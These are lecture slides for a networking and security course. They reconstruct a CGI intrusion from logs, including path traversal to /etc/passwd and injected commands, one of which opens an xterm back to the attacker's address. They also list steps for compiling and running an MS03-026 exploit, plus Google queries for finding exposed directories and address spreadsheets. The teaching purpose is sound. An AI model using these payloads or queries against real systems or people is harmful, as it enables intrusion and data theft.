Computer Network and Security

Published on March 2017
Computer Networking and Security

RUDI LUMANTO
STMIK NUSA MANDIRI
November 2008

References and Contact Info

- Glenn Berg, "Networking Essentials", New Riders
- Deborah Russell, G.T. Gangemi Sr., "Computer Security Basics", O'Reilly & Associates
- John E. Canavan, "Fundamentals of Network Security", Artech House
- Internet

Contact: RUDI LUMANTO
[email protected]
0815-1036-9754
STMIK NUSA MANDIRI

ASSESSMENT CRITERIA
- Assignments (2-4 reports): 20%
- Mid-term exam: 30%
- Attendance: 10%
- Final exam: 40%

SYLLABUS
- Overview
- Network standards (OSI)
- Network components
- Network protocol (TCP/IP)
- Network OS and services
- Network/Internet security

SYLLABUS (continued)
- Software threats: virus, worm, etc.
- Internet threats: TCP attack, DNS, DoS, etc.
- Firewall and Intrusion Detection System (IDS)
- Cryptography and its applications
- VPN

COMPUTER NETWORKING and SECURITY: OVERVIEW

Topic map (translated from the slide):
- Standards
- Network security
- Network components
- Internet threats: TCP attack, DoS, DNS, etc.
- Protocol (TCP/IP)
- Software threats: virus, worm, etc.
- Network OS and services
- Firewall and IDS
- Cryptography and applications
- VPN

COMPUTER NETWORKING and SECURITY
1. OVERVIEW

Outline
- Simple cases and tools
- Why computer networking and why security?
- Computer security goals
- Threats, vulnerabilities, attacks
- Policy and measures
- Making a good security policy

Simple case and tool (seeing the technique/information behind a case)

A Security Case

A company called "Acme-art Inc" does online business on the internet. They have a database that records all customer information, including credit card information, and it is connected to their site www.acme-art.com, which is protected by a firewall.

On 31 October 2001 a hacker intruded into their system and stole all the credit card information, then posted it to a Usenet newsgroup. A few hours later the company had lost millions of dollars and its reputation, and had to invest much more money to keep the business alive.

What happened?
How could it happen?

Fact: the firewall is installed, and internet access can only be done through HTTP port 80.

Security team investigation: Sample case 1

Looking for clues in the log file...

A
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891

B
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580

C
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272

D
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

E
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358

F
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228

Security team investigation: Sample case 1

Part A in log file
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891

Browsing...

Security team investigation: Sample case 1

Part B in log file
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580

Browsing...

Security team investigation: Sample case 1

Part C in log file
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272

Trying direct access... Error response

Security team investigation: Sample case 1

Part D in log file
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

Attacking... Security hole 1

Security team investigation: Sample case 1

Perl script

Security hole 1: the parameter value from the form is passed to the index.cgi script without validation.
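As an added illustration of what validating the page parameter means (this is not the slide's Perl script, which is not reproduced in this copy, and the function names are assumptions), the Python below contrasts a resolver that uses the parameter as given with one that checks it against an allow-list of page names and then confirms the resolved path is still under the document root. The document root /var/www/html follows the httpd structure slide and the .shtml naming follows the log lines. In Perl, a two-argument open() on a value that begins or ends with "|" runs it as a command, which is the usual way a CGI file-inclusion hole of this kind turns into the command execution seen in part F; the same allow-list rejects those values, since "|" and newline never match a page name.

```python
import posixpath
import re
from urllib.parse import unquote_plus

# Assumption: pages live directly under the default document root shown on
# the httpd structure slide and are named like falls.shtml / tahoel.shtml.
DOCROOT = "/var/www/html"
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.shtml")
SHELL_META = set("|;&`$\n\r")


def unsafe_resolve(page: str) -> str:
    """Security hole 1 as the slides describe it: the parameter is used as
    given. Joining an absolute or '..'-laden value to the document root and
    normalising it walks straight out of the web tree."""
    return posixpath.normpath(posixpath.join(DOCROOT, page))


def rejection_reason(page: str):
    """Return why a parameter value must be refused, or None if it is clean.
    The order only decides the message; every branch is a rejection."""
    if page == "":
        return "empty parameter"
    if ".." in page or page.startswith("/"):
        return "path traversal"
    if any(ch in page for ch in SHELL_META):
        return "shell metacharacters"
    if not PAGE_NAME.fullmatch(page):
        return "not an allowed page name"
    return None


def safe_resolve(page: str):
    """Allow-list validation first, then a second check that the resolved
    path is still inside DOCROOT. Returns the path, or None when refused."""
    if rejection_reason(page) is not None:
        return None
    resolved = posixpath.normpath(posixpath.join(DOCROOT, page))
    if not resolved.startswith(DOCROOT + "/"):
        return None
    return resolved


def check_query_value(raw: str):
    """Decode a raw query-string value the way a CGI would (%0a -> newline,
    '+' -> space) and return (decoded value, rejection reason or None)."""
    decoded = unquote_plus(raw)
    return decoded, rejection_reason(decoded)


if __name__ == "__main__":
    # Parameter values taken from the log lines on the slides.
    for raw in ("falls.shtml", "", "/../../../../../../../../../etc/passwd",
                "|ls+-la+/%0aid%0awhich+xterm|"):
        decoded, reason = check_query_value(raw)
        print(f"{raw!r:45} unsafe -> {unsafe_resolve(decoded)!r}")
        print(f"{'':45} safe   -> {safe_resolve(decoded)!r} ({reason or 'accepted'})")
```

The allow-list is the real control; the startswith() check on the normalised path is a second, independent guard so that a future relaxation of the regular expression cannot silently reopen the traversal.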

Security team investigation: Sample case 1

Part E in log file
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358

Attacking... Security hole 1
Recovering the passwd file

Security team investigation: Sample case 1

Passwd file
root:x:0:0:root:/root:/bin/bash
......
......
......
Lion:x:500:500::/home/lion:/bin/bash

Security hole 1 effect: recovering the important "passwd" file

Security team investigation: Sample case 1

Part F in log file
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228

Attacking... Security hole 2
Direct execution of server commands
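To show how a log reviewer would triage parts A to F mechanically rather than by eye, here is an added Python example (not from the slides) that parses common-log-format lines, decodes the CGI query the way the server would, and flags the indicators the investigation found: a 403 on /cgi-bin/, an empty page parameter, ".." traversal, and shell metacharacters in a parameter. The sample input is the slide's log lines re-typed, not a live capture; names such as flagged_requests are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache/NCSA common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\d+|-)$'
)
SHELL_META = set("|;&`\n\r")

# Sample input: the log lines from the slides, re-typed (constructed for the demo).
SAMPLE_LOG = """\
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
"""


def parse_line(line: str):
    """Split one common-log line into fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values so 'page=' (part D) is seen as an empty parameter;
    # parse_qsl also decodes %0a and '+' the way the CGI would.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def findings_for(rec) -> list:
    """Defensive indicators a log reviewer would flag for one request."""
    found = []
    if rec["status"] == 403:
        found.append("forbidden response (403)")
    for name, value in rec["params"]:
        if value == "":
            found.append(f"empty parameter {name}")
        if ".." in value or value.startswith("/") or "/etc/passwd" in value:
            found.append("path traversal")
        if any(ch in value for ch in SHELL_META) or "$(" in value:
            found.append("command injection")
    return found


def flagged_requests(log_text: str) -> list:
    """Return the records that carry at least one finding, in log order."""
    out = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rec["findings"] = findings_for(rec)
        if rec["findings"]:
            out.append(rec)
    return out


def suspicious_sources(log_text: str) -> dict:
    """Count flagged requests per client IP (a single source here, as on the slides)."""
    return dict(Counter(rec["ip"] for rec in flagged_requests(log_text)))


if __name__ == "__main__":
    for rec in flagged_requests(SAMPLE_LOG):
        print(rec["time"], rec["target"], "->", ", ".join(rec["findings"]))
    print(suspicious_sources(SAMPLE_LOG))  # {'10.0.1.21': 5}
```

Decoding before matching matters: the %0a in part F is a newline once the CGI unescapes it, so a rule that inspects only the raw request line would miss the second command. Note also that every flagged request here returned 200, which is why response codes alone are not enough to catch this case.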


Information/technique behind the case
- Understanding about computers and networks
- Information about the target
- HTTP structure
- CGI/Perl
- Linux system and its commands

Httpd file default structure -> what is the web site structure?

Lisv01
/ (root)
|-- home/
|   `-- u01, u02, u03, ...   (default user's directory)
|       `-- public_html/
|-- var/
|   |-- www/
|   |   `-- html/            (default document root)
|   `-- log/
|       `-- httpd/
|-- sbin/
|-- bin/
|-- etc/
|   |-- httpd/
|   |   `-- conf/
|   |       `-- httpd.conf   (file)
|   `-- init.d/
|       `-- httpd            (file)
|-- dev/
`-- usr/ ...

*Document root: the directory that holds HTML documents.

Behind the Web

1. Client-side application: the WWW browser requests a page over the Internet/Intranet from the WWW server (server software); the server returns HTML & script, and the browser executes the application (JavaScript).

2. Network-loading application: the browser downloads the application from the WWW server over the Internet/Intranet and executes it locally (Java applet, ActiveX).

3. Server-side application: the browser sends a request over the Internet/Intranet; the WWW server software executes the application on the server (CGI, Active Server Pages) and returns the result.

Sample case 2

After a period of new recruitment, a server in a company suddenly crashed. The company network became unavailable for a while, which led to a large loss in production.
What happened?
How could it happen?
No log file indication!!!

Sample case 2
Security team investigation: looking for clues by social engineering

One new employee installed Windows 2000 Server on his computer and connected it to the LAN with a global IP address.

Other clues:
1. Nessus report on vulnerabilities in Windows 2000
2. Exploit program available

Analysis of host: Nessus report on Windows 2000 Server after IIS installation

Address of host | Port/Service         | Issue regarding port
192.168.27.31   | ftp (21/tcp)         | Security hole found
192.168.27.31   | smtp (25/tcp)        | Security hole found
192.168.27.31   | http (21/tcp)        | Security hole found
192.168.27.31   | nntp (119/tcp)       | Security hole found
192.168.27.31   | msrpc (135/tcp)      | Security hole found
192.168.27.31   | netbios-ssn (139/tcp)| No security hole found
192.168.27.31   | https (443/tcp)      | No security hole found
192.168.27.31   | microsoft-ds (445/tcp)| Security hole found
......          | ....                 | ....
......          | ....                 | ....

Sample case 2

NESSUS report in detail

Vulnerability: msrpc (135/tcp)
The remote host is running a version of Windows which has a flaw in its RPC interface which may allow an attacker to execute arbitrary code and gain SYSTEM privileges. There is at least one worm which is currently exploiting this vulnerability, namely the MsBlaster worm.
Solution: see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor: high
CVE: CAN-2003-0352
BID: 8205
Other references: IAVA:2003-A-0011
NESSUS ID: 11806

Warning: msrpc (135/tcp)
Distributed Computing Environment (DCE) services running on the remote host
Other references: IAVA:2003-A-0012
NESSUS ID: 11835

Sample case 2

NESSUS ID: identity number of the vulnerability check by NESSUS
BID: Bugtraq ID: related documentation regarding the vulnerability, including exploit code; see the SecurityFocus site

Simulation
1. Downloading the exploit source file (from the SecurityFocus site or the Whoppix CD)
   $ cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c
2. Compiling the source file
   $ gcc oc192-dom.c
3. Executing the exploit against the target IP machine
   $ a.out -d 192.168.94.204
   Get the system access:
   C:\WINNT\SYSTEM32>

Information/technique behind the case
- Understanding about networks
- Insufficient security orientation for new employees
- Lack of knowledge about the OS
- There is always exploit code on the internet
- Lack of information about updates

Why Computer Networks?

1. File sharing -> allows access to a file anytime and anywhere
2. Effective data transfer -> fast and efficient data delivery
3. Hardware sharing -> one printer, hard disk, etc. can be shared
4. Realtime communication -> communication via text, audio, image or video in realtime
5. Operational cost reduction -> reduces the cost of telephone communication, paper use, mailing letters, etc.

File/information resource sharing

Information resources: printer, data, files
- Users can share a printer connected to the LAN. There is no need to connect a printer to each computer.
- Users can share data on the computers: a user on computer C can handle files on computer B as if they were his own files.

Effective data transfer

- The data transmission speed is tens to several hundred Mbps. For example, an A4-sized document (30 Kbytes) can be transmitted over a LAN in 0.024 second.
- bps (bits per second) = a unit of the rate at which data can be transmitted over a communication line, expressed as the number of bits transmitted per second. 9600 bps means 9600 bits are transmitted in one second.

Hardware sharing

- Effective use of hardware (printer, hard disk, etc.)
- Easy to add new computers or relocate existing computers
- Easy to connect to computers of different vendors

Example of Network Use
Seat reservation network

- Inquiries are issued from various places
- Connected to the seat reservation database on the central computer
- Answers to inquiries are generated immediately
- Also updates the database and issues a ticket
Example of a similar system: money withdrawal, balance inquiry, etc.

Type of Network
Mainly divided into 2 types based on their scale (the area that a network covers).
- LAN is implemented within a building or factory.
- WAN is implemented by connecting two or more LANs, between offices and laboratories, or between two countries.

Why Computer Security?
- To protect company/individual assets
  - Hardware, software and INFORMATION (data, ability and reputation)
- To gain a competitive advantage
  - How many people would use a bank's internet banking system if they knew that the system had been hacked in the past?
- To comply with regulatory requirements
- To keep your job

Computer Security Goals
- Confidentiality
- Integrity
- Availability

Confidentiality: prevention of unauthorized access to data, and of accidental data disclosures.
Integrity: prevention of improper modifications of the data, either intentionally or accidentally: 1) modification of the data by unauthorized parties; 2) operation on data by authorized personnel in ways that are incompatible with the nature (syntax) of the data, leading to its corruption; 3) any modification to append-only records, to alter their evidence value.
Availability: measures to protect data should not result in making it difficult to access and modify the data in the ways in which it was intended.

Threats, Vulnerabilities and Attacks

THREATS
Anything that can disrupt the operation, functioning, integrity or availability of a computer system.
- Stand-alone threats: threats that arise without any connection to other systems. Ex: virus, password cracker
- Connection threats: threats that arise because of connection to other systems

Threats arising from connection to other computers
- Information leaks: a database of customer information, including credit card numbers, is leaked from an Internet service provider.
- Falsification: the contents of the web site of a public institution are rewritten with the political messages of a dissident group.
- Denial of service: a bookshop site is attacked and its server goes down, discontinuing service.
- Impersonation: an intruder fakes a membership site for the purchase of merchandise.
- Attack platform: a corporate network administering a server used as a platform for attacking other sites was sued for compensation for the damage caused.

Vulnerabilities
Weakness in the design, configuration or implementation of a computer system that renders it susceptible to a threat.

1. POOR DESIGN
Hardware and software systems that contain design flaws that can be exploited. Ex: sendmail flaws in early versions of Unix that allowed hackers to gain privileged root access.

2. POOR IMPLEMENTATION
Systems that are incorrectly configured because of inexperience, insufficient training or sloppy work. Ex: a system that does not have restricted access privileges on critical executable files.

3. POOR MANAGEMENT
Inadequate procedures and insufficient checks and balances. Ex: no documentation and monitoring.

Critical Vulnerabilities and Vulnerability Scanning
- Certain security vulnerabilities are declared critical when they are (or are about to be) actively exploited and represent a clear and present danger.
- Upon notification of a critical vulnerability, systems must be patched by a given date or they will be blocked from network access.

Types of Vulnerability

OS/Program name | Cause | Influence
Index Server (Windows NT), Index Service (Windows 2000) | ISAPI extension idq.dll overflow | Local system permission seized by an outsider
telnetd (FreeBSD 4.3 and earlier, Red Hat 7.1 and earlier, etc.) | Buffer overflow during AYT optional packet processing | Telnetd permission (normally root) seized by an outsider
sadmind (Solaris 2.3 - 7) | Buffer overflow during NETMGT_PROC_SERVICE request processing | Command executable with root permission by an outsider
SSH 1.2.31, OpenSSH 2.2 and earlier | Overflow in an int variable in the detect_attack function | Command executable with root permission by an outsider
dtspcd (AIX 4.3/5.1, HP-UX 11.11, Solaris 8, etc.) | Buffer overflow in a shared library | Arbitrary command executable with root permission by an outsider
BIND 8.2.x (Red Hat, Turbolinux, Solaris, AIX, etc.) | Buffer overflow during TSIG processing | Operation permission (normally root) seized by an outsider
wu-ftpd 2.6.0 and earlier (Red Hat Linux 6.2 and earlier, etc.) | Format string bug in the site-exec and setproctitle functions | Execution permission (normally root) seized by an outsider
IIS 4.0 (Windows NT), IIS 5.0 (Windows 2000) | Access to a file outside the root directory permitted when the path name is Unicode | Shell command executed with IUSR_Machinename permission by an outsider

ATTACKS
A specific technique used to exploit a vulnerability. Ex: a threat could be a denial of service, a vulnerability is in the design of the OS, and an attack could be a "ping of death".

- Passive attacks: gathering information by monitoring and recording traffic on the network, or by social engineering. Ex: packet sniffing, traffic analysis
- Active attacks: overt actions on the computer system.

Denial of Service
(Diagram: an attack platform starts the attack against the target hosts; the service goes down due to overload)
- Large volume of data
- Packets that bring the system down

Policy and Measure
- Security Trinity: the foundation for all security policies and measures that an organization develops and deploys
  (Diagram labels: Security, Prevention)

What is Security?
Definitions from the American Heritage Dictionary:
- Freedom from risk or danger: safety
- Measures adopted ... to prevent a crime.
Computer security measures: mechanisms to prevent, detect and recover from threats and attacks, or for auditing purposes.

Key point
Computer security is not only a technical problem, it is a business and people problem. The technology is the easy part; the difficult part is developing security policies/plans that fit the organization's business operation and getting people to comply with the plan.
-> Social engineering: non-technical methods hackers employ to gain access to a system; refers to the process of convincing a person to reveal information.

Security operations
- Prevention against accidental capture or modification of information
- Detection of all improper access to data and system resources
- Recovery from unauthorized access, restoring data values, system integrity, etc.

Policies and Procedures
- User privileges
- Data backup
- Security tools to deploy
- Monitoring the integrity
- Response to incidents
- User roles, etc.

Types of Users
- Hacker: a user who tries to obtain access using advanced knowledge and techniques.
- Cracker: a user who attempts sabotage and other subversive activities with malicious motives.
- Script kiddy: a user who has little technical capability and uses tools available on the Internet when attempting cyber attacks.
(Diagram: a corporate network with a vulnerability; intrusion, subversion, sabotage)

Integrity Check Tool
(Diagram)
/etc/passwd file -> hash value (MD5): dc577ef5f97b671781c04425737bc4df
File editing/falsification -> hash value (MD5): b0ed782bbd4c8445f07538a3ede788eb
Mismatch ... Altered!!
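An added Python example (not a tool from the slides) of the integrity check the diagram describes: record a baseline digest for each monitored file, recompute it later, and report each file as ok, altered or missing. The slide's hashes are MD5; this example defaults to SHA-256 because MD5 collisions are practical, and accepts algorithm="md5" to reproduce the slide's values. The file names, contents and function names in demo() are constructed for the demonstration.

```python
import hashlib
import hmac
import os
import tempfile

CHUNK = 64 * 1024


def file_digest(path: str, algorithm: str = "sha256") -> str:
    """Hex digest of a file, read in chunks so large files need no extra RAM.
    The slide uses MD5; pass algorithm="md5" to reproduce that, but prefer
    SHA-256 for a baseline an attacker must not be able to collide."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(paths, algorithm: str = "sha256") -> dict:
    """Record the known-good digest of every monitored file."""
    return {p: file_digest(p, algorithm) for p in paths}


def verify(baseline: dict, algorithm: str = "sha256") -> dict:
    """Compare each file against the baseline: 'ok', 'altered' or 'missing'."""
    report = {}
    for path, expected in baseline.items():
        if not os.path.exists(path):
            report[path] = "missing"
            continue
        actual = file_digest(path, algorithm)
        # constant-time comparison; a mismatch means the file was edited
        report[path] = "ok" if hmac.compare_digest(actual, expected) else "altered"
    return report


def demo() -> dict:
    """Constructed scenario: three files are baselined, then one is edited
    (an account line appended, like the slide's falsification step) and one
    is deleted. Returns {basename: status}."""
    with tempfile.TemporaryDirectory() as d:
        files = {
            "passwd": b"root:x:0:0:root:/root:/bin/bash\n",
            "hosts": b"127.0.0.1 localhost\n",
            "group": b"root:x:0:\n",
        }
        for name, content in files.items():
            with open(os.path.join(d, name), "wb") as f:
                f.write(content)
        baseline = build_baseline(os.path.join(d, n) for n in files)
        with open(os.path.join(d, "passwd"), "ab") as f:
            f.write(b"Lion:x:500:500::/home/lion:/bin/bash\n")
        os.remove(os.path.join(d, "group"))
        return {os.path.basename(p): s for p, s in verify(baseline).items()}


if __name__ == "__main__":
    print(demo())  # {'passwd': 'altered', 'hosts': 'ok', 'group': 'missing'}
```

The baseline itself has to be stored where the intruder cannot rewrite it (read-only media or a separate host), otherwise an attacker who can edit /etc/passwd can just as easily update the stored hash to match.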


Security Tools and Security Products
(Diagram: malicious user -> Internet -> corporate network -> server/client)

Network security, countermeasures against hacking:
- Router (filtering)
- Firewall (VPN)
- N-IDS
- Vulnerability audit

Server security, countermeasures against hacking:
- H-IDS
- Log monitoring
- Falsification prevention
- Vulnerability audit

Miscellaneous:
- Network: virus scan, encryption
- Server: virus scan, encryption (SSH)

Firewall?
(Diagram: Internet | firewall | Intranet, with a public WWW server, a public FTP server, clients, an internal server and authentication; flows 1 HTTP, 2 HTTP, 3 FTP, 4 HTTP, 5 unspecified application)

- Packet filtering
- GW type firewall: application gateway
- Stateful inspection

Encryption

VPN (Virtual Private Network) = a leased line over the Internet, e.g. IPsec, IPv6
(Diagram: remote access user -> FW/VPN router -> Providers A, B, C, D and an IX across the Internet -> FW/VPN router; encrypted communication end to end)

Making a good security policy
- Penetration test / ethical hacking: understanding what is inside the hacker's mind
- Security Trinity
- Security goals

Definition of "Ethical Hacking"
Ethical hacking is where a computer and network expert attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system, ethical hackers use the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known as penetration testing, intrusion testing, and red teaming. Individuals involved in ethical hacking are sometimes called white hats, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat.

One of the first examples of ethical hacking at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.

Inside the Hacker's Mind
- Successfully attack and save -

- Focus on the target
- Never use your own information
- Never leave your footsteps
- Can always come back again

HACKER'S PROCEDURE

Hacker's Procedure/Steps
1. Information gathering
   - Targeting
   - Scanning
2. Attack, intrusion
   - Remote attack
   - Local attack
3. Unauthorized act
4. Actions taken after the unauthorized act
   - Log removing / deception
   - Space using
   - Time stamp
   - Back door

Example of Targeting
All information about the target
- Technique name: web browser targeting
- Goals: personal information about the target
- Operation base: any web browser with a search engine site (Google); online databases (WHOIS, IP conversion, etc.)

Location, related company/organization, news, telephone number, contact (mail address), web author's ideas/thoughts/behaviour, site software

Targeting with Google

By using the basic search techniques combined with Google's advanced operators, anyone can perform information-gathering and vulnerability-searching using Google. This technique is commonly referred to as Google hacking.

Google hacking
- Mastering Google using its standard options
  - Double quotation .... to recognize a keyword as a phrase
  - Hyphen (-) .... to exclude words containing the keyword
  - site: .... searching only inside the site
  - * .... wildcard; use with double quotation to find any indicated word
  - intitle: .... search limited only to the web title
  - inurl: .... search limited only to the web page URL
  - intext: .... search limited only to the main page of the web
  - filetype: .... search focusing on the extension type of a file
  - phonebook: .... search telephone numbers

Google hacking
- Mastering Google using its standard options (examples)
  - site: .... searching only inside the site
    "hacker" site:www.cnn.com  or  site:www.cnn.com hacker
    This query searches for the word hacker, restricting the search to the http://www.cnn.com web site: how many pages on the CNN web server contain the word hacker?
  - * .... wildcard; use with double quotation to find any indicated word
    "He is a * Hacker"
  - intitle: .... search limited only to the web title
    intitle: "Hacker"
  - inurl: .... search limited only to the web page URL
    inurl: www.securityfocus.com
  - intext: .... search limited only to the main page of the web
    intext: "earthquake"
  - filetype: .... search focusing on the extension type of a file
    "hacking" filetype:ppt
    "whoppix" filetype:iso
  - phonebook: .... search telephone numbers
    phonebook: John Doe CA

More on Google hacking

Searching inside a site for what is (actually) not exposed to the public

Finding directory listings on servers
Directory listings provide a list of files and directories in a browser window instead of the typical text-and-graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering. Most directory listings begin with the phrase "Index of", which also shows in the title. An obvious query to find this type of page might be intitle:index.of, which may find pages with the term "index of" in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:
- Index of Native American Resources on the Internet
- LibDex - Worldwide index of library catalogues
- Iowa State Entomology Index of Internet Resources

More on Google hacking

Combining Google options in queries
Several alternate queries provide more accurate results:
intitle:index.of "parent directory"
intitle:index.of name size
These queries indeed provide directory listings by not only focusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches to find files or directories located in directory listings.
Example:
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data" intitle:bbs
bbs.dat inurl:"Index of" intitle:"Index of"


More on Google hacking
Example: searching for databases of people's addresses written in CSV, focusing on Japanese sites
-> filetype:csv address site:jp
Example: searching for databases of people's addresses written in Excel, focusing on UK sites
-> filetype:xls address site:uk

THANK YOU

The Dawn of the Net
